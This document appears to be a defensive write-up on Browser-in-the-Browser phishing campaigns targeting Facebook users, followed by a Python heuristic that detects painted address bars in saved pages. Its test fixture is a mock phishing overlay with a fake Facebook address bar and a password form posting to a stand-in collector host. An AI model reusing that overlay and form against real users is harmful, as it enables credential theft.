Overview
- Security researchers report a marked rise in Browser-in-the-Browser (BitB) phishing campaigns over the past six months that specifically target Facebook users.
- Attackers render fake pop-up windows inside the phishing page itself, drawn with HTML and CSS to imitate a genuine login window complete with a spoofed address bar; because the "window" is ordinary page content, the URL it displays is whatever the attacker typed and proves nothing. Credentials entered into it are used for account takeovers and fraud.
- Lures commonly impersonate legal threats, suspension or security alerts, and "action required" messages that funnel victims through shortened links and fake CAPTCHA gates; the CAPTCHA step also keeps automated scanners from reaching the phishing content.
- Phishing pages frequently reside on legitimate platforms such as Netlify and Vercel, whose valid TLS certificates and good domain reputation blunt URL- and certificate-based checks; some sites mimic Meta’s Privacy Center and harvest personal information via fake appeal forms.
- PhaaS offerings including Sneaky2FA and RaccoonO365 have introduced BitB features. Experts advise enabling 2FA or, better, passkeys, which are bound to the real origin and will not authenticate to a spoofed window, and verifying pop-up behavior before entering credentials: a genuine pop-up can be dragged outside the parent browser window, while a BitB overlay is clipped at the page edge and its "address bar" can be selected as text.
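The mechanism in the bullets above (a browser window painted in HTML inside the phishing page) gives a triage check for saved pages: real browser chrome is never part of the DOM, so a visible text node that spells out a URL or hostname, sits outside any link, names a host other than the one the page was actually served from, and shares the page with a password field is a painted address bar. The following is an added example, not code from the original report or from any vendor named in it; it uses only the Python standard library, and the two page samples and the hosts meta-appeal-center.netlify.app and collector.example are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags that never wrap text, so they are not pushed onto the ancestor stack.
VOID_TAGS = {"input", "img", "br", "hr", "meta", "link"}
# Text that looks like an address-bar entry: optional scheme, a dotted host, optional path.
URL_TEXT = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?:/\S*)?", re.I)


def same_site(host, page_host):
    """True when host is the page's own host or a parent of it (facebook.com vs www.facebook.com)."""
    host, page_host = host.lower(), page_host.lower()
    return host == page_host or page_host.endswith("." + host)


class _Collector(HTMLParser):
    """Collects the three signals the heuristic needs in one pass over the HTML."""

    def __init__(self):
        super().__init__()
        self.stack = []           # open non-void ancestors of the current text node
        self.url_texts = []       # visible URL-like text outside <a>, <script>, <style>
        self.password_inputs = 0
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form" and attrs.get("action"):
            self.form_actions.append(attrs["action"])
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or tag not in self.stack:
            return                # ignore stray or void end tags instead of emptying the stack
        while self.stack.pop() != tag:
            pass

    def handle_data(self, data):
        text = re.sub(r"^\W+", "", data.strip())   # drop a leading lock glyph or other decoration
        if not text or any(t in ("a", "script", "style") for t in self.stack):
            return
        if URL_TEXT.fullmatch(text):
            self.url_texts.append(text)


def analyze_page(html, page_host):
    """Score one saved page. page_host is the host the HTML was actually served from."""
    c = _Collector()
    c.feed(html)
    c.close()
    # A URL drawn as page text whose host is not the serving host is a painted address bar.
    displayed_hosts = sorted({URL_TEXT.fullmatch(t).group(1).lower() for t in c.url_texts
                              if not same_site(URL_TEXT.fullmatch(t).group(1), page_host)})
    # Forms posting off-site are where the captured credentials go.
    exfil_hosts = sorted({urlsplit(a).hostname for a in c.form_actions
                          if urlsplit(a).hostname and not same_site(urlsplit(a).hostname, page_host)})
    return {
        "bitb_likely": bool(displayed_hosts) and c.password_inputs > 0,
        "displayed_hosts": displayed_hosts,
        "password_inputs": c.password_inputs,
        "exfil_hosts": exfil_hosts,
    }


# Constructed sample: a BitB overlay painting a fake Facebook address bar above a
# credential form that posts to an attacker-controlled collector (hosts are hypothetical).
BITB_SAMPLE = """
<html><body>
<div class="page">Your account is scheduled for suspension. Log in to appeal.</div>
<div class="fake-window" style="position:fixed;top:80px;left:120px">
  <div class="fake-chrome"><span class="fake-addr">🔒 https://www.facebook.com/login.php</span></div>
  <form action="https://collector.example/cred" method="post">
    <input name="email" type="text">
    <input name="pass" type="password">
    <button>Log In</button>
  </form>
</div>
</body></html>
"""

# Constructed sample: a login page on its own host; the only URL-like text is the site's
# own domain in the footer, which is not a painted address bar.
BENIGN_SAMPLE = """
<html><body>
<form action="/login" method="post">
  <input name="email" type="text"><input name="pass" type="password">
</form>
<footer>facebook.com <a href="https://about.meta.com">About Meta</a></footer>
</body></html>
"""

if __name__ == "__main__":
    print(analyze_page(BITB_SAMPLE, "meta-appeal-center.netlify.app"))
    print(analyze_page(BENIGN_SAMPLE, "www.facebook.com"))
```

Run it over the saved HTML of a suspect page together with the host it was fetched from. A false negative is expected when the fake address bar is an image rather than text, so treat a clean result as one signal, not clearance; the exfil_hosts field is the more durable indicator and feeds directly into blocklists.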